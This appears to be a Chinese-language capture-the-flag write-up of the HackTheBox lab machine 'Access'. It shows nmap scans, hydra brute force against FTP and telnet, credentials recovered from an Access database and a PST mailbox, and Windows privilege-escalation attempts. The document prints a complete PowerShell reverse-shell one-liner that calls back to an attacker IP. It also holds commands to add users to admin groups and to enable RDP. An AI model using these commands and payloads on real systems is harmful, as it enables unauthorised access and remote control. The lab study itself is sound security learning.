Access(port:23-telnet登入反弹cmd)

1
2
3
4
5
6
7
8
9
10
11
12
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
23/tcp open  telnet
80/tcp open  http

nmap -sV -p 21,23,80 10.10.10.98
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5

os: 通过搜索关键词”IIS 7.5“,可得知系统版本为windows 7

21

ftp匿名登陆

1
2
3
ls
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer

获得了两个文件Access Control.zip、backup.mdb

ftp传输报错

1
2
3
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.

于是查看是否传输成功

mdb文件的大小

1
2
3
4
5
6
服务器文件:
08-23-18  08:16PM              5652480 backup.mdb

本地文件:
-rw-r--r-- 1 root root 5651666 Dec 27 21:16 backup.mdb

尝试了很多遍,猜测是Binary or ASCII Mode,文件传输模式的问题。

好麻烦,干脆不用命令行传输了,下载一个ftp客户端。

传输格式问题
如果要将文件从Windows传输到基于Unix的服务器,Ascii模式将删除每行末尾的CR(回车)字符。 您可能会注意到您上传的文件小于本地文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
hydra -L /root/Desktop/86/user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.98 ftp
[21][ftp] host: 10.10.10.98   login: ftp   password: 123456
[21][ftp] host: 10.10.10.98   login: ftp   password: password
[21][ftp] host: 10.10.10.98   login: ftp   password: 12345678
[21][ftp] host: 10.10.10.98   login: ftp   password: 1234
[21][ftp] host: 10.10.10.98   login: ftp   password: pussy
[21][ftp] host: 10.10.10.98   login: ftp   password: 12345
[21][ftp] host: 10.10.10.98   login: ftp   password: qwerty
[21][ftp] host: 10.10.10.98   login: ftp   password: 696969
[21][ftp] host: 10.10.10.98   login: ftp   password: mustang
[21][ftp] host: 10.10.10.98   login: ftp   password: letmein
[21][ftp] host: 10.10.10.98   login: ftp   password: baseball
[21][ftp] host: 10.10.10.98   login: ftp   password: master
[21][ftp] host: 10.10.10.98   login: ftp   password: michael
[21][ftp] host: 10.10.10.98   login: ftp   password: dragon
[21][ftp] host: 10.10.10.98   login: ftp   password: football
[21][ftp] host: 10.10.10.98   login: ftp   password: shadow

apt install filezilla
图形界面ftp登陆失败。

mdb查看工具

1
2
3
4
5
6
7
下载查看mdb文件的工具
sudo apt-get install mdbtools mdbtools-gmdb mdbtools-dev

mdb-tables backup.mdb 查看该数据库的表
提示段错误
offset 7585302654976 is beyond EOF
Segmentation fault

密码破解

cd /usr/share/wordlists/ && fcrackzip -D -p long-pass-rockyou.txt -u /root/Desktop/98/a.zip
破解失败

23

1
2
3
4
5
6
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.

Welcome to Microsoft Telnet Service

hydra -L /root/Desktop/86/user.txt -P /usr/share/wordlists/500-worst-passwords.txt 10.10.10.98 telnet

MS15-002 telnet服务缓冲区溢出漏洞分析与POC构造

80

除了一张图片没有检查出任何东西

线索断了,获取到的zip破解不了密码,获取到的数据库找不到关键信息。

ms15-034 http.sys

msf成功读取服务器内存,但好像没什么用,都是乱码

参考资料:https://www.reddit.com/r/linux/comments/4syuw5/working_with_a_pst_file_in_linux/
https://www.youtube.com/watch?v=8B8cs_KkmfQ
http://theevilbit.blogspot.com/2013/01/backtrack-forensics-convert-pst-mail.html

attack vector
在mdb数据库中,用mdb-tools搜索user

获得一个口令

access4u@security,用该口令解开zip文件。

下载evolution,准备打开pst文件

sudo apt-get install evolution evolution-plugins

Access Control.pst

1
2
3
readpst Access\ Control.pst   pst格式转换,生成了mbox文件
mail -f Access\ Control 查看mbox文件
1

获取一个shell

security/4Cc3ssC0ntr0ller

1
2
3
4
5
6
7
8
9
10
11
12
C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38


net user

User accounts for \\ACCESS

-------------------------------------------------------------------------------
Administrator            engineer                 Guest                    
security                 
The command completed successfully.

提权

参考资料:https://www.cnblogs.com/hack0ne/p/4592536.html

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
C:\Users\security>type t.bat
powershell -executionpolicy bypass C:\Users\Public\s2.ps1


 Directory of C:\

08/23/2018  10:05 PM    <DIR>          inetpub
07/14/2009  03:20 AM    <DIR>          PerfLogs
08/23/2018  08:53 PM    <DIR>          Program Files
08/24/2018  07:40 PM    <DIR>          Program Files (x86)
08/24/2018  07:39 PM    <DIR>          temp
01/07/2019  08:50 PM    <DIR>          Users
08/23/2018  10:40 PM    <DIR>          Windows
08/22/2018  07:23 AM    <DIR>          ZKTeco
               0 File(s)              0 bytes
cd ZKTeco/ZKAccess3.5 有很多access数据库文件

cd inetpub

C:\inetpub>dir

 Volume in drive C has no label.

 Volume Serial Number is 9C45-DBF0



 Directory of C:\inetpub



08/23/2018  10:05 PM    <DIR>          .

08/23/2018  10:05 PM    <DIR>          ..

08/21/2018  08:55 PM    <DIR>          custerr

08/23/2018  10:50 PM    <DIR>          ftproot

08/24/2018  08:22 PM    <DIR>          history

08/21/2018  08:55 PM    <DIR>          logs

08/21/2018  08:55 PM    <DIR>          temp

08/24/2018  07:39 PM    <DIR>          wwwroot

               0 File(s)              0 bytes

               8 Dir(s)  16,620,236,800 bytes free



输入命令systeminfo

Host Name:                 ACCESS
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84191
Original Install Date:     8/21/2018, 9:43:10 PM
System Boot Time:          1/7/2019, 8:14:54 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
net user whale /add  添加用户,权限不够
提示:System error 5 has occurred.
Access is denied.

net localgroup
Aliases for \\ACCESS

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
The command completed successfully.

---
net localgroup TelnetClients
security   说明只有security用户能够用telnet登陆
---
net localgroup Users
Administrator
engineer
NT AUTHORITY\Authenticated Users
NT AUTHORITY\INTERACTIVE
security
The command completed successfully.

---
net localgroup Administrators 查看管理员组
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
---

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 尝试开启3389,失败
---

runas /user:engineer cmd
access4u@security

runas /user:Administrator cmd
123456
没有任何提示,例如"The command completed successfully.",应该失败了
查了一下,cmd只能注销用户再以其他用户登陆
-------------------------------------------------------------------------------
Administrator
The command completed successfully.

net localgroup Administrators security /add  尝试将本用户加入管理员组,失败。

net localgroup "Remote Desktop Users"
net localgroup "Remote Desktop Users" security /add   尝试加入远程桌面用户组

尝试1

web路径发现一个目录,浏览器访问以及telnet访问无权限。于是google一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
C:\inetpub>cd wwwroot

C:\inetpub\wwwroot>dir
 Volume in dri

 C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\inetpub\wwwroot

08/24/2018  07:39 PM    <DIR>          .
08/24/2018  07:39 PM    <DIR>          ..
08/21/2018  10:30 PM    <DIR>          aspnet_client
08/23/2018  11:33 PM               391 index.html
08/24/2018  07:39 PM            88,712 out.jpg
               2 File(s)         89,103 bytes
               3 Dir(s)  16,623,439,872 bytes free

cd aspnet_client
1
2
3
4
http://10.10.10.98/aspnet_client/system_web/

403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials that you supplied.

IIS 7.5源代码披露/身份验证绕过
https://blog.alertlogic.com/blog/internet-information-server-(iis)-exploitation/

尝试2,powershell反弹shell

1
2
3
4
5
6
7
8
9
nc -lnvp 6688

copy con whale.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',6688);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Yes

type whale.ps1

总结

下回学下windows,没有msf怎么手动提权。windows提权做的比较少。